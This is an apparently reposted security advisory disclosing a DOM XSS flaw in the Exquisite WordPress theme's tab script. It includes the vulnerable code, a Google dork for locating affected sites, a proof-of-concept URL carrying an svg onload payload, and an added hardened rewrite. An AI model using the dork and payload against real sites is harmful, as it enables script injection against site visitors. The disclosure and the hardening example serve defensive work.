DOM Cross Site Scripting In Exquisite - Ultimate Newspaper WordPress Theme



Hello friends, today I am sharing my 0-day exploit in a WordPress theme. Here is the exploit:

http://packetstormsecurity.com/files/131657/wpultimatenewspaper-xss.txt




# Exploit Title: DOM Cross Site Scripting In Exquisite - Ultimate Newspaper WordPress Theme
# Google Dork: inurl:/wp-content/themes/exquisite-wp/assets/
# Date: 24/04/2015
# Exploit Author: Osama Mahmood (M4rkm3n)
# Vendor Homepage: http://themeforest.net/item/exquisite-ultimate-newspaper-theme/6264019
# Software Link: http://themeforest.net/item/exquisite-ultimate-newspaper-theme/6264019
# Tested on: Windows 8/7

Hello friend,

Today I am filing this DOM XSS vulnerability, which I found in the WordPress theme
(Exquisite - Ultimate Newspaper).
The vulnerability is caused by an issue at line 83 of
exquisite-wp/assets/js/jquery.foundation.plugins.js

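Vulnerable code:

 });

    if (window.location.hash) {
      // window.location.hash is attacker-controlled and is concatenated
      // unvalidated into the jQuery selector string
      activateTab($('a[href="' + window.location.hash + '"]').parent('dd'));
      settings.callback();
    }

  };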

and it was causing DOM XSS.

[-] Proof Of Concept:
URL:
http://localhost/x/wordpress/wp-content/themes/exquisite-wp/assets/
http://localhost/x/wordpress/#<svg/onload=prompt(document.domain)>
[-] Fix / Solution:
Update to latest framework.
[-] Reported:
Was reported to the Developers on 26/04/2015
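
As an added example (not part of the original advisory and not the theme's own code), here is a hardened form of the hash handling shown under "Vulnerable code": it validates the fragment and compares it to each link's href attribute as data instead of concatenating it into a jQuery selector. The allowed id pattern, the 'dl.tabs a' selector in the usage comment, and the sample link objects are assumptions.

```javascript
// Added example, not the theme's code. Assumption: tab ids look like "#name1".
const TAB_HASH_RE = /^#[A-Za-z][A-Za-z0-9_:.-]{0,63}$/;

// Returns the decoded hash when it is a plain id reference, otherwise null.
function safeTabHash(hash) {
  if (typeof hash !== 'string') return null;
  let decoded;
  try {
    // Browsers differ on whether location.hash is percent-decoded,
    // so validate the decoded form.
    decoded = decodeURIComponent(hash);
  } catch (e) {
    return null; // malformed percent-encoding
  }
  return TAB_HASH_RE.test(decoded) ? decoded : null;
}

// Finds the link whose href attribute equals the validated hash. The value is
// compared as data, so it is never parsed as a selector or as HTML.
function findTabLink(links, hash) {
  const target = safeTabHash(hash);
  if (target === null) return null;
  for (const link of links) {
    if (link.getAttribute('href') === target) return link;
  }
  return null;
}

// Browser usage in place of the vulnerable lookup (the 'dl.tabs a' selector is
// an assumption about the theme's markup):
//   const link = findTabLink(document.querySelectorAll('dl.tabs a'),
//                            window.location.hash);
//   if (link) activateTab($(link).parent('dd'));

// Constructed stand-ins for <a> elements so the block also runs under Node.
const sampleLinks = ['#simple1', '#simple2'].map((href) => ({
  getAttribute: (name) => (name === 'href' ? href : null),
}));

for (const h of ['#simple2', '#<svg/onload=prompt(document.domain)>', '#%zz']) {
  const hit = findTabLink(sampleLinks, h);
  console.log(JSON.stringify(h), '->', hit ? hit.getAttribute('href') : null);
}
```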

My Profile :-
https://www.facebook.com/th3.m4rkm3n.007
https://twitter.com/OsamaMahmood007
https://www.linkedin.com/in/osamamahmood007
Hi, this is Osama Mahmood, and I will share all my knowledge and skills on #infosec with you and hope you will enjoy learning new and unique things. Follow me on Twitter @OsamaMahmood007